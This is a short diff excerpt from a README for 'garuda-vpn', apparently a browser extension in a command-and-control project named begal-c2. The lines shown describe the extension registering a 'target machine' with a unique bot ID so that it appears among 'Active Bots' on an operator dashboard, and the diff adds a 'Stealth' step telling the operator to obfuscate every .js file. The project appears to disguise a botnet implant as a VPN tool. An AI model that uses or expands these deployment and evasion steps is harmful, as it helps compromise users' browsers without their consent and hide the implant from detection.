XsanFlip/begal-c2/garuda-vpn/README.md

 *   The extension will automatically generate a unique `botUUID` for the target machine.
 *   Check your B.E.G.A.L Dashboard; the browser should now appear in the **"Active Bots"** list.

+### 5. Stealth
+*   To make Garuda-VPN better, don't forget to obfuscate each .js file.

 ---

 ## 🔒 Security Measures